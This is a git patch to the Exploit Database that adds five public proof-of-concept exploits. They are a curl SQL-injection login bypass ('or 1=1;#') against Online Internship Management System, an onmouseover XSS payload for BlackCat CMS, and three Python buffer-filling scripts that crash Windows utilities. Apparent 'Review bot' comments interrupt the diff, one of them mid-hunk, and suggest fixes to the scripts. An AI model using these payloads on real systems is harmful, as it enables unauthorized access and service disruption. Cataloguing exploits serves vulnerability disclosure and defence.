From 6dac9b14470d9dcbf97566529c63a69a8e2a6059 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 17 Feb 2021 05:01:55 +0000
Subject: [PATCH] DB: 2021-02-17

6 changes to exploits/shellcodes

Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC)
AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC)
Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)
Online Internship Management System 1.0 - 'email' SQL injection Auth Bypass
BlackCat CMS 1.3.6 - 'Display name' Cross Site Scripting (XSS)
---
 exploits/php/webapps/49469.txt | 1 +
 exploits/php/webapps/49564.txt | 18 ++++++++++++++++++
 exploits/php/webapps/49565.txt | 13 +++++++++++++
 exploits/windows/dos/49566.txt | 29 +++++++++++++++++++++++++++++
 exploits/windows/dos/49567.txt | 27 +++++++++++++++++++++++++++
 exploits/windows/dos/49568.txt | 29 +++++++++++++++++++++++++++++
 files_exploits.csv | 5 +++++
 7 files changed, 122 insertions(+)
 create mode 100644 exploits/php/webapps/49564.txt
 create mode 100644 exploits/php/webapps/49565.txt
 create mode 100644 exploits/windows/dos/49566.txt
 create mode 100644 exploits/windows/dos/49567.txt
 create mode 100644 exploits/windows/dos/49568.txt

diff --git a/exploits/php/webapps/49469.txt b/exploits/php/webapps/49469.txt
index 11445358f..464aebbb5 100644
--- a/exploits/php/webapps/49469.txt
+++ b/exploits/php/webapps/49469.txt
@@ -4,6 +4,7 @@
 # Software Link: https://www.sourcecodester.com/download-code?nid=12210&title=CASAP+Automated+Enrollment+System+using+PHP%2FMySQLi+with+Source+Code
 # Version: 1
 # Tested on Windows
+# CVE: CVE-2021-3294
 
 *XSS IMPACT:*
 1: Steal the cookie
diff --git a/exploits/php/webapps/49564.txt b/exploits/php/webapps/49564.txt
new file mode 100644
index 000000000..8a451acf9
--- /dev/null
+++ b/exploits/php/webapps/49564.txt
@@ -0,0 +1,18 @@
+# Exploit Title: Online Internship Management System 1.0 - 'email' SQL injection Auth Bypass
+# Date: 16-02-2021
+# Exploit Author: Christian Vierschilling
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/14712/online-internship-management-system-phpmysqli-full-source-code.html
+# Version: 1.0
+# Tested on: PHP 7.4.14, Linux x64_x86
+
+
+# --- Description --- #
+
+The application contains sql injections in the parameters 'email' and 'password' in the file 'login.php'.
+
+# --- Proof of concept --- #
+
+Curl request for authentication bypass via sql injection in parameter 'email':
+
+curl http://x.x.x.x/internship/login.php --data "email='%20or%201=1;#&password=none&login="
\ No newline at end of file
diff --git a/exploits/php/webapps/49565.txt b/exploits/php/webapps/49565.txt
new file mode 100644
index 000000000..22c94d92c
--- /dev/null
+++ b/exploits/php/webapps/49565.txt
@@ -0,0 +1,13 @@
+# Exploit Title: BlackCat CMS 1.3.6 - 'Display name' Cross Site Scripting (XSS)
+# Date: 16-02-2021
+# Exploit Author: Kamaljeet Kumar - TATA Advanced Systems Limited
+# Vendor Homepage: https://blackcat-cms.org/
+# Software Link: https://blackcat-cms.org/page/download.php
+# Version: BlackCat CMS - 1.3.6
+# Tested on: Windows
+
+# Steps to Reproduce:
+
+1. To exploit this vulnerability an attacker has a login in the admin panel and clicks on the admin profile button. Then use " onmouseover=alert(1) " this XSS payload on Display name field and click on the Save button.
+
+2 .Then refresh the page and hover the mouse on Display name filed and our XSS message pop up.
\ No newline at end of file
diff --git a/exploits/windows/dos/49566.txt b/exploits/windows/dos/49566.txt
new file mode 100644
index 000000000..486f9a432
--- /dev/null
+++ b/exploits/windows/dos/49566.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC)
+# Date: 2021-02-15
+# Exploit Author: Ismael Nava
+# Vendor Homepage: https://switchportmapper.com/
+# Software Link: https://switchportmapper.com/download.htm
+# Version: 2.85.2
+# Tested on: Windows 10 Home x64
+
+
+#STEPS
+# Open the program Managed Switch Port Mapping Tool
+# In the left side select Settings from Router/Srvr 1 (for layer 2 Switches)
+# Run the python exploit script, it will create a new .txt files
+# Copy the content of the file "Gou.txt"
+# Paste the content in the field IP Address and SNMP v1/v2c Read Community Name
+# Click in OK
+# End :)
+
+
+buffer = 'F' * 10000
+
+try:
+ file = open("Gou2.txt","w")
+ file.write(buffer)
+ file.close()
+
+ print("Archive ready")
+except:
+ print("Archive no ready")
\ No newline at end of file
diff --git a/exploits/windows/dos/49567.txt b/exploits/windows/dos/49567.txt
new file mode 100644
index 000000000..80486f799
--- /dev/null
+++ b/exploits/windows/dos/49567.txt
@@ -0,0 +1,27 @@
+# Exploit Title: AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC)
+# Date: 2021-02-15
+# Exploit Author: Ismael Nava
+# Vendor Homepage: http://agatasoft.com/
+# Software Link: http://agatasoft.com/Ping_Master_Pro.exe
+# Version: 2.1
+# Tested on: Windows 10 Home x64
+
+#STEPS
+# Open the program AgataSoft PingMaster Pro
+# In Tools select the option Trace Route
+# Run the python exploit script, it will create a new .txt files
+# Copy the content of the file "Gou.txt"
+# Paste the content in the field Host name and click in Get IP from host name
+# End :)
+
+
+buffer = 'S' * 10000
+
+try:
+ file = open("Gou.txt","w")
+ file.write(buffer)
+ file.close()
+
+ print("Archive ready")
+except:
+ print("Archive no ready")
\ No newline at end of file
diff --git a/exploits/windows/dos/49568.txt b/exploits/windows/dos/49568.txt
new file mode 100644
index 000000000..34c626e5b
--- /dev/null
+++ b/exploits/windows/dos/49568.txt
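Review bot: The steps in the new 49566.txt tell the reader to copy the content of "Gou.txt", but the script beneath them opens `"Gou2.txt"`, so the file the steps refer to is never produced; make the two agree, e.g. `file = open("Gou.txt","w")`. The same write block here and in 49567.txt and 49568.txt also leaves the handle open if `write` raises, and the bare `except:` hides the real failure behind the generic 'Archive no ready' message. A `with open(...) as file:` block together with `except OSError as exc:` that prints `exc` would close the file on every path and make a permissions or path problem visible to the reader.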
@@ -0,0 +1,29 @@
+# Exploit Title: Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)
+# Date: 2021-02-15
+# Exploit Author: Ismael Nava
+# Vendor Homepage: https://www.nsauditor.com/
+# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
+# Version: 3.2.2.0
+# Tested on: Windows 10 Home x64
+
+
+#STEPS
+# Open the program Nsauditor
+# In Options select Configuration...
+# Click in Security Events
+# Run the python exploit script, it will create a new .txt files
+# Copy the content of the file "Liella.txt"
+# Paste the content in the field Event Description and click in Add Event
+# End :)
+
+
+buffer = 'U' * 10000
+
+try:
+ file = open("Liella.txt","w")
+ file.write(buffer)
+ file.close()
+
+ print("Archive ready")
+except:
+ print("Archive no ready")
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index a82540083..3a4ebf875 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6768,6 +6768,9 @@ id,file,description,date,author,type,platform,port
 49283,exploits/multiple/dos/49283.txt,"Nxlog Community Edition 2.10.2150 - DoS (Poc)",2020-12-17,"Guillaume PETIT",dos,multiple,
 49337,exploits/windows/dos/49337.py,"Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)",2021-01-04,stresser,dos,windows,
 49489,exploits/multiple/dos/49489.html,"jQuery UI 1.12.1 - Denial of Service (DoS)",2021-01-28,"Rafael Cintra Lopes",dos,multiple,
+49566,exploits/windows/dos/49566.txt,"Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC)",2021-02-16,"Ismael Nava",dos,windows,
+49567,exploits/windows/dos/49567.txt,"AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC)",2021-02-16,"Ismael Nava",dos,windows,
+49568,exploits/windows/dos/49568.txt,"Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)",2021-02-16,"Ismael Nava",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
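Review bot: The three new rows for 49566, 49567 and 49568 carry the date 2021-02-16 while the `# Date:` header in each of those files says 2021-02-15, so the index and the entries disagree. If the date column is meant to mirror the entry header, the rows should read `2021-02-15`; if it records the publication date instead, that is not stated anywhere on the page and the discrepancy is worth confirming. The two rows added in the later hunk match their files' 16-02-2021 headers.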
@@ -43752,3 +43755,5 @@ id,file,description,date,author,type,platform,port
 49556,exploits/multiple/webapps/49556.py,"Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2)",2021-02-11,"Metin Yunus Kandemir",webapps,multiple,
 49557,exploits/php/webapps/49557.py,"Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3)",2021-02-11,"Ricardo Ruiz",webapps,php,
 49562,exploits/php/webapps/49562.sh,"Teachers Record Management System 1.0 - 'searchteacher' SQL Injection",2021-02-15,"Soham Bakore",webapps,php,
+49564,exploits/php/webapps/49564.txt,"Online Internship Management System 1.0 - 'email' SQL injection Auth Bypass",2021-02-16,"Christian Vierschilling",webapps,php,
+49565,exploits/php/webapps/49565.txt,"BlackCat CMS 1.3.6 - 'Display name' Cross Site Scripting (XSS)",2021-02-16,"Kamaljeet Kumar",webapps,php,